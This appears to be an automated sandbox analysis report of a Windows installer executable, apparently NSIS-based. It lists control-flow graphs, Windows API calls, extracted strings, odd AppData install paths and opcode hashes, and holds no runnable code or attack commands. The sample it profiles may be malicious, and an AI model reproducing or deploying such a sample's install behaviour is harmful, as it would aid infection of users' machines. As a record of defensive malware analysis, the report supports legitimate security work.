                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                                                                                  • Opcode ID: 107ad6bdab59df7c6dc1e53992544a2f2aa45a341ad300a22c315677171673b9
                                                                                                                                                                                                  • Instruction ID: cb6f0490afd218b95da4ce8f8645ed9f2a2dc6dad26b5163c80864a666f03042
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 107ad6bdab59df7c6dc1e53992544a2f2aa45a341ad300a22c315677171673b9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40C1AFB1600305EFDB206F61EE85E2B7A68FB85706B54053EFA81B11F0CB799841DB2D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 295 403ae0-403af8 call 406806 298 403afa-403b0a call 406358 295->298 299 403b0c-403b43 call 4062df 295->299 306 403b66-403b8f call 403db6 call 405dee 298->306 304 403b45-403b56 call 4062df 299->304 305 403b5b-403b61 lstrcatW 299->305 304->305 305->306 313 403c21-403c29 call 405dee 306->313 314 403b95-403b9a 306->314 320 403c37-403c5c LoadImageW 313->320 321 403c2b-403c32 call 40644e 313->321 314->313 315 403ba0-403bc8 call 4062df 314->315 315->313 322 403bca-403bce 315->322 324 403cdd-403ce5 call 40140b 320->324 325 403c5e-403c8e RegisterClassW 320->325 321->320 327 403be0-403bec lstrlenW 322->327 328 403bd0-403bdd call 405d13 322->328 337 403ce7-403cea 324->337 338 403cef-403cfa call 403db6 324->338 329 403c94-403cd8 SystemParametersInfoW CreateWindowExW 325->329 330 403dac 325->330 334 403c14-403c1c call 405ce6 call 406411 327->334 335 403bee-403bfc lstrcmpiW 327->335 328->327 329->324 333 403dae-403db5 330->333 334->313 335->334 336 403bfe-403c08 GetFileAttributesW 335->336 341 403c0a-403c0c 336->341 342 403c0e-403c0f call 405d32 336->342 337->333 348 403d00-403d1a ShowWindow call 406796 338->348 349 403d83-403d84 call 40554c 338->349 341->334 341->342 342->334 356 403d26-403d38 GetClassInfoW 348->356 357 403d1c-403d21 call 406796 348->357 352 403d89-403d8b 349->352 354 403da5-403da7 call 40140b 352->354 355 403d8d-403d93 352->355 354->330 355->337 358 403d99-403da0 call 40140b 355->358 361 403d50-403d73 DialogBoxParamW call 40140b 356->361 362 403d3a-403d4a GetClassInfoW RegisterClassW 356->362 357->356 358->337 365 403d78-403d81 call 403a30 361->365 362->361 365->333
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,?), ref: 00406818
                                                                                                                                                                                                    • Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                                                                                                                                                  • lstrcatW.KERNEL32(1033,0042D268), ref: 00403B61
                                                                                                                                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\subrigidness\testimonialist,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75D43420), ref: 00403BE1
                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\subrigidness\testimonialist,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403BF4
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403BFF
                                                                                                                                                                                                  • LoadImageW.USER32(?,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\subrigidness\testimonialist), ref: 00403C48
                                                                                                                                                                                                    • Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365
                                                                                                                                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403C85
                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C9D
                                                                                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CD2
                                                                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403D08
                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403D34
                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403D41
                                                                                                                                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403D4A
                                                                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403E8E,00000000), ref: 00403D69
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\U6SJBLxT2Z.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\subrigidness\testimonialist$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                  • API String ID: 1975747703-1492853417
                                                                                                                                                                                                  • Opcode ID: d0a9a63d962560b66f9d03636585c912b1b432706de4baa1d25fdb2d125816db
                                                                                                                                                                                                  • Instruction ID: ef062d508cd4fc62497976b4bc03dd7eae2cd9e8a178e807e7972486bae2ade7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0a9a63d962560b66f9d03636585c912b1b432706de4baa1d25fdb2d125816db
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A61B8711447006EE320AF66AE46F2B3A6CEBC5B4AF40453FF941B61E1DB7D9901CA2D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 369 403015-403063 GetTickCount GetModuleFileNameW call 405f07 372 403065-40306a 369->372 373 40306f-40309d call 406411 call 405d32 call 406411 GetFileSize 369->373 374 403245-403249 372->374 381 4030a3 373->381 382 403188-403196 call 402fb1 373->382 383 4030a8-4030bf 381->383 388 403198-40319b 382->388 389 4031eb-4031f0 382->389 386 4030c1 383->386 387 4030c3-4030cc call 403467 383->387 386->387 395 4031f2-4031fa call 402fb1 387->395 396 4030d2-4030d9 387->396 391 40319d-4031b5 call 40347d call 403467 388->391 392 4031bf-4031e9 GlobalAlloc call 40347d call 40324c 388->392 389->374 391->389 415 4031b7-4031bd 391->415 392->389 420 4031fc-40320d 392->420 395->389 399 403155-403159 396->399 400 4030db-4030ef call 405ec2 396->400 405 403163-403169 399->405 406 40315b-403162 call 402fb1 399->406 400->405 418 4030f1-4030f8 400->418 411 403178-403180 405->411 412 40316b-403175 call 4068f3 405->412 406->405 411->383 419 403186 411->419 412->411 415->389 415->392 418->405 424 4030fa-403101 418->424 419->382 421 403215-40321a 420->421 422 40320f 420->422 425 40321b-403221 421->425 422->421 424->405 426 403103-40310a 424->426 425->425 427 403223-40323e SetFilePointer call 405ec2 425->427 426->405 428 40310c-403113 426->428 432 403243 427->432 428->405 430 403115-403135 428->430 430->389 431 40313b-40313f 430->431 433 403141-403145 431->433 434 403147-40314f 431->434 432->374 433->419 433->434 434->405 435 403151-403153 434->435 435->405
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403026
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\U6SJBLxT2Z.exe,00000400,?,?,00000009,?), ref: 00403042
                                                                                                                                                                                                    • Part of subcall function 00405F07: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\U6SJBLxT2Z.exe,80000000,?,?,?,00000009,?), ref: 00405F0B
                                                                                                                                                                                                    • Part of subcall function 00405F07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000009,?), ref: 00405F2D
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\U6SJBLxT2Z.exe,C:\Users\user\Desktop\U6SJBLxT2Z.exe,80000000,?,?,?,00000009,?), ref: 0040308E
                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,?,?,00000009,?), ref: 004031C4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\U6SJBLxT2Z.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\U6SJBLxT2Z.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                  • API String ID: 2803837635-3987435278
                                                                                                                                                                                                  • Opcode ID: a52360a1b04fecb28cdb34ea46c0a5e0142df37db4d5eb2ecb020a06199e7e0c
                                                                                                                                                                                                  • Instruction ID: 352fdba277142773567f3d30b5bba7b1c47688a28dd7517ec43723b707c69b17
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a52360a1b04fecb28cdb34ea46c0a5e0142df37db4d5eb2ecb020a06199e7e0c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF51D331904204ABDB109FA5DD85B9E7EACEB48356F24803BF910BA2D1C77C9F418B9D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 657 40644e-406459 658 40645b-40646a 657->658 659 40646c-406482 657->659 658->659 660 406488-406495 659->660 661 40669a-4066a0 659->661 660->661 664 40649b-4064a2 660->664 662 4066a6-4066b1 661->662 663 4064a7-4064b4 661->663 665 4066b3-4066b7 call 406411 662->665 666 4066bc-4066bd 662->666 663->662 667 4064ba-4064c6 663->667 664->661 665->666 669 406687 667->669 670 4064cc-40650a 667->670 673 406695-406698 669->673 674 406689-406693 669->674 671 406510-40651b 670->671 672 40662a-40662e 670->672 677 406534 671->677 678 40651d-406522 671->678 675 406630-406636 672->675 676 406661-406665 672->676 673->661 674->661 679 406646-406652 call 406411 675->679 680 406638-406644 call 406358 675->680 682 406674-406685 lstrlenW 676->682 683 406667-40666f call 40644e 676->683 681 40653b-406542 677->681 678->677 684 406524-406527 678->684 695 406657-40665d 679->695 680->695 687 406544-406546 681->687 688 406547-406549 681->688 682->661 683->682 684->677 685 406529-40652c 684->685 685->677 691 40652e-406532 685->691 687->688 693 406584-406587 688->693 694 40654b-406572 call 4062df 688->694 691->681 698 406597-40659a 693->698 699 406589-406595 GetSystemDirectoryW 693->699 705 406612-406615 694->705 706 406578-40657f call 40644e 694->706 695->682 697 40665f 695->697 701 406622-406628 call 4066c0 697->701 703 406605-406607 698->703 704 40659c-4065aa GetWindowsDirectoryW 698->704 702 406609-40660d 699->702 701->682 702->701 708 40660f 702->708 703->702 707 4065ac-4065b6 703->707 704->703 705->701 713 406617-40661d lstrcatW 705->713 706->702 710 4065d0-4065e6 SHGetSpecialFolderLocation 707->710 711 4065b8-4065bb 707->711 708->705 716 406601 710->716 717 4065e8-4065ff SHGetPathFromIDListW CoTaskMemFree 710->717 711->710 715 4065bd-4065c4 711->715 713->701 719 4065cc-4065ce 715->719 716->703 717->702 717->716 719->702 719->710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040658F
                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,?,004054B0,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000), ref: 004065A2
                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(004054B0,00424020,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,?,004054B0,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000), ref: 004065DE
                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00424020,Call), ref: 004065EC
                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00424020), ref: 004065F7
                                                                                                                                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040661D
                                                                                                                                                                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,?,004054B0,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000), ref: 00406675
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                  • API String ID: 717251189-3340266710
                                                                                                                                                                                                  • Opcode ID: 2c2ecd46c083869abf5f0cc2869f7ea5c15be7567ee334f864889eeacbeedf20
                                                                                                                                                                                                  • Instruction ID: cd0f296135d024e5542a1133132ccafb23cc3a0c8fe84acec88ebf75cbd5934e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c2ecd46c083869abf5f0cc2869f7ea5c15be7567ee334f864889eeacbeedf20
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C614471A00111AADF208F54DD41BBE37A5AF44314F26853FE943B62D0EB3E5AA2CB5D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 784 40324c-403263 785 403265 784->785 786 40326c-403275 784->786 785->786 787 403277 786->787 788 40327e-403283 786->788 787->788 789 403293-4032a0 call 403467 788->789 790 403285-40328e call 40347d 788->790 794 403455 789->794 795 4032a6-4032aa 789->795 790->789 796 403457-403458 794->796 797 403400-403402 795->797 798 4032b0-4032f9 GetTickCount 795->798 799 403460-403464 796->799 802 403442-403445 797->802 803 403404-403407 797->803 800 40345d 798->800 801 4032ff-403307 798->801 800->799 805 403309 801->805 806 40330c-40331a call 403467 801->806 807 403447 802->807 808 40344a-403453 call 403467 802->808 803->800 804 403409 803->804 809 40340c-403412 804->809 805->806 806->794 818 403320-403329 806->818 807->808 808->794 816 40345a 808->816 812 403414 809->812 813 403416-403424 call 403467 809->813 812->813 813->794 821 403426-403432 call 405fb9 813->821 816->800 820 40332f-40334f call 406961 818->820 826 403355-403368 GetTickCount 820->826 827 4033f8-4033fa 820->827 828 403434-40343e 821->828 829 4033fc-4033fe 821->829 830 4033b3-4033b5 826->830 831 40336a-403372 826->831 827->796 828->809 834 403440 828->834 829->796 832 4033b7-4033bb 830->832 833 4033ec-4033f0 830->833 835 403374-403378 831->835 836 40337a-4033ab MulDiv wsprintfW call 405479 831->836 837 4033d2-4033dd 832->837 838 4033bd-4033c4 call 405fb9 832->838 833->801 839 4033f6 833->839 834->800 835->830 835->836 841 4033b0 836->841 843 4033e0-4033e4 837->843 844 4033c9-4033cb 838->844 839->800 841->830 843->820 845 4033ea 843->845 844->829 846 4033cd-4033d0 844->846 845->800 846->843
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                                                                                  • String ID: *B$ @B$ A$ A$... %d%%
                                                                                                                                                                                                  • API String ID: 551687249-163439198
                                                                                                                                                                                                  • Opcode ID: 6aa008098f4ef09d38d5c59ecde741492560208fda71d4d747c9693988f45b69
                                                                                                                                                                                                  • Instruction ID: 934ec796fb5923f126773143cacc3683187fa16e161fba292e3b1b9e9ada072f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6aa008098f4ef09d38d5c59ecde741492560208fda71d4d747c9693988f45b69
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44518C71D00219DBCB11DF65EA84B9E7FA8AF01756F10817BEC10BB2C1C7789A40CBA9
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 847 40176f-401794 call 402d3e call 405d5d 852 401796-40179c call 406411 847->852 853 40179e-4017b0 call 406411 call 405ce6 lstrcatW 847->853 858 4017b5-4017b6 call 4066c0 852->858 853->858 862 4017bb-4017bf 858->862 863 4017c1-4017cb call 40676f 862->863 864 4017f2-4017f5 862->864 872 4017dd-4017ef 863->872 873 4017cd-4017db CompareFileTime 863->873 865 4017f7-4017f8 call 405ee2 864->865 866 4017fd-401819 call 405f07 864->866 865->866 874 40181b-40181e 866->874 875 40188d-4018b6 call 405479 call 40324c 866->875 872->864 873->872 876 401820-40185e call 406411 * 2 call 40644e call 406411 call 405a77 874->876 877 40186f-401879 call 405479 874->877 889 4018b8-4018bc 875->889 890 4018be-4018ca SetFileTime 875->890 876->862 909 401864-401865 876->909 887 401882-401888 877->887 892 402bcb 887->892 889->890 891 4018d0-4018db CloseHandle 889->891 890->891 895 4018e1-4018e4 891->895 896 402bc2-402bc5 891->896 894 402bcd-402bd1 892->894 898 4018e6-4018f7 call 40644e lstrcatW 895->898 899 4018f9-4018fc call 40644e 895->899 896->892 905 401901-402390 898->905 899->905 910 402395-40239a 905->910 911 402390 call 405a77 905->911 909->887 912 401867-401868 909->912 910->894 911->910 912->877
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\subrigidness\testimonialist\Phonolog\Individualansvarets\Komplementarerne,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                    • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,?,00000009,?), ref: 0040641E
                                                                                                                                                                                                    • Part of subcall function 00405479: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000,00424020,75D423A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                                                                                                                                    • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000,00424020,75D423A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                                                                                                                                    • Part of subcall function 00405479: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,004033B0), ref: 004054D4
                                                                                                                                                                                                    • Part of subcall function 00405479: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll), ref: 004054E6
                                                                                                                                                                                                    • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                                                                                                                                    • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                                                                                                                                    • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp$C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll$C:\Users\user\AppData\Local\subrigidness\testimonialist\Phonolog\Individualansvarets\Komplementarerne$Call
                                                                                                                                                                                                  • API String ID: 1941528284-990755586
                                                                                                                                                                                                  • Opcode ID: 898ce4c5b6941fe7d419b72eda9361d5450072f2bf0dde35a2139be17a2a5618
